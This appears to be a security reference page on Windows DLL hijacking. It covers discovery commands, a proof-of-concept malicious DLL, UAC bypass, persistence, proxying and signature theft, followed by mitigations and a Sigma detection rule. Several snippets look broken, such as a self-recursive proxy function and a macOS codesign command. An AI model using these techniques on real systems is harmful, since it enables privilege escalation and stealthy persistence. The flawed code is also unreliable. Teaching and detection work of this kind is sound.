Home / Windows Security / DLL Hijacking
High Severity | T1574.001

📦 DLL Hijacking

MITRET1574.001
PlatformWindows
PhaseExecution, Persistence
DifficultyMedium

🧠 Description

DLL Hijacking exploits Windows DLL search order to execute malicious code by placing a crafted DLL in a location where a legitimate application will load it. This technique is used for execution, privilege escalation, and persistence.

Why DLL Hijacking Works:
  • Unsafe Search Order: Programs search current directory before system paths
  • Missing DLLs: Applications reference DLLs that don't exist
  • Writable Directories: User-accessible directories in search path
  • No Signature Validation: Many apps don't verify DLL authenticity

Windows DLL Search Order (SafeBoot excluded):

  1. Application directory
  2. System32 (or SysWOW64)
  3. Windows directory
  4. Current working directory
  5. PATH environment directories

🔍 DLL Hijacking Discovery

Find Missing DLLs:

# Use Procmon to find DLL load failures
# Filter: Result = NAME NOT FOUND
# Then find first instance of missing DLL per process

# PowerShell - find executables with missing DLLs
Get-ChildItem C:\Program Files -Recurse -Filter "*.exe" | ForEach-Object {
    $exe = $_.FullName
    try {
        $deps = [System.Reflection.Assembly]::LoadFile($exe)
    } catch {}
}

# Quick check with dumpbin (VS Tools)
dumpbin /dependents application.exe

# List DLLs loaded by application
tasklist /m | findstr application.exe

Find Writable Directories:

# Check common directories for write access
icacls "C:\Windows\System32"
icacls "C:\Windows"
icacls "C:\Program Files"
icacls "C:\Program Files (x86)"

# Check if PATH directories are writable
$env:PATH -split ';' | ForEach-Object { 
    if (Test-Path $_) { 
        $acl = Get-Acl $_ 
        $acl.Access | Where-Object { $_.IdentityReference -like "*Users*" -and $_.FileSystemRights -like "*Write*" } 
    } 
}

# Use accesschk
accesschk.exe -wqd "Users" C:\Windows\Temp

Automated Discovery (FinDLL, dll-hijack-detector):

# Using PowerSploit - Find-ProcessDLLHijack
Import-Module .\Find-ProcessDLLHijack.ps1
Find-ProcessDLLHijack -ProcessName notepad

# Find all hijackable DLLs
Get-ChildItem C:\Windows\System32 -Filter "*.exe" | Find-ProcessDLLHijack

# Using Winpeas
winpeas.exe quiet

# Search for known vulnerable DLLs
Get-ChildItem C:\Windows -Filter "*.dll" -Recurse | Select-Object Name

💣 Exploitation

1. Basic DLL Hijack (Write to Application Directory):

# Create malicious DLL
# header file
#include 

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        WinExec("cmd.exe /c whoami > C:\\temp\\dll_hijack.txt", SW_HIDE);
    }
    return TRUE;
}

# Compile with MinGW
x86_64-w64-mingw32-gcc -shared -o evil.dll evil.c -lwinapi32

2. Masquerade as Missing DLL:

# Identify missing DLL using Procmon or:
# Run: procmon.exe /quiet /minimal /backingfile capture.pml
# Then filter in UI or use: procmon.exe /terminate

# Place DLL in application directory
copy evil.dll "C:\Program Files\App\legit.dll"

# When app runs, it loads your DLL

3. UAC Bypass via DLL Hijack:

# Find auto-elevated binary that loads DLL from writable path
# Common targets: eventvwr.exe, mmc.exe, fodhelper.exe

# Check if DLL search path is writable
where eventvwr.exe
icacls C:\Windows\System32\eventvwr.exe

# If Binary triggers MMC which loads something from CWD
# Create your DLL in a folder you control

# Example: write to fodhelper path if writable
copy evil.dll C:\Windows\System32\fodhelper.exe.local\

4. Persistence via DLL Search Order Hijack:

# Identify app that runs at startup and loads missing DLL
# Place malicious DLL in that app's directory

# Registry run key
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run

# Or scheduled task that runs app
schtasks /create /tn "TaskName" /tr "C:\Program Files\App\app.exe" /sc daily

🔐 Advanced DLL Techniques

1. DLL Proxying (Forward Exports):

# Use DLL Export Viewer to get original exports
# Then create proxy DLL that forwards to original

// Proxy DLL
#include 
#pragma comment(lib, "OriginalDLL.lib")

extern "C" {
    __declspec(dllexport) void OriginalFunction() {
        // Your code here
        WinExec("calc.exe", SW_SHOW);
        // Call original
        OriginalFunction();
    }
}

# Compile and replace original DLL (or use DLL search order)

2. Phantom DLL Hijacking:

# Create DLL with same name as missing DLL
# Place in application directory

# Check if app uses LoadLibrary (which doesn't search CWD)
# Need to place in SafeDllSearchMode path

# Or exploit when app calls SetDllDirectory("")
# This removes SafeDllSearchMode and uses current directory first

3. DLL Sideloading (Side Loading):

# Find legitimate DLL that's loaded from writable location
# Place your DLL there with same name

# Use SigThief to copy signature from legitimate DLL
python3 SigThief.py -i legitimate.dll -o malicious.dll

# Then sign with codesign
codesign -sign malicious.dll

🎯 Persistence via DLL Hijack

Scheduled Task Hijack:

# Find scheduled task that runs executable
schtasks /query /fo LIST /v | findstr /i "TaskName\|Program"

# Check if executable's directory is writable
icacls "C:\Scheduled App Path"

# Place malicious DLL in that directory

Service Binary Path Hijack:

# Find service with writable path
Get-WmiObject win32_service | Select Name, PathName, StartMode

# If C:\Program Files\App\service.exe uses C:\Windows\Temp\app.dll
# And C:\Windows\Temp is writable, place DLL there

🛡️ Mitigation

✅ Primary Controls:
  • Secure DLL Search: Use SafeDllSearchMode registry setting
  • Remove Writable PATH: Eliminate user-writable directories from PATH
  • Code Integrity: Enable Windows Defender Application Control (WDAC)
  • Disable SetDllDirectory: Prevent removing SafeDllSearchMode
  • Load DLLs with Full Path: Application development best practice

Enable Safe DLL Search Mode:

# Registry setting
REG ADD "HKLM\System\CurrentControlSet\Control\Session Manager" /v SafeDllSearchMode /t REG_DWORD /d 1 /f

# Value 1 = search system directory first
# Value 0 = search current directory first (vulnerable)

🔍 Detection

Sysmon DLL Load Monitoring:

# Sysmon Event ID 7 - DLL Loaded
# Monitor for:
# - DLL loaded from unexpected locations (temp, user directories)
# - DLL loaded with no signature
# - DLL with suspicious imports (WinExec, CreateRemoteThread)


  
    
      Temp
      Users
      Invalid

Sigma Rule for DLL Search Order Hijacking:

title: DLL Search Order Hijacking
id: dll-hijack
detection:
  selection:
    EventID: 7
    ImageLoaded|contains:
      - 'C:\Users'
      - 'C:\Temp'
      - 'C:\Windows\Temp'
  condition: selection
level: high

🛠️ Tools

  • Procmon: Monitor DLL loads in real-time
  • Winpeas: Find writable directories and DLL vulnerabilities
  • DLL Export Viewer: View DLL exports for proxying
  • SigThief: Copy digital signatures
  • PowerSploit Find-ProcessDLLHijack: Automated discovery
  • accesschk: Check directory permissions

📚 References

Back to Windows Security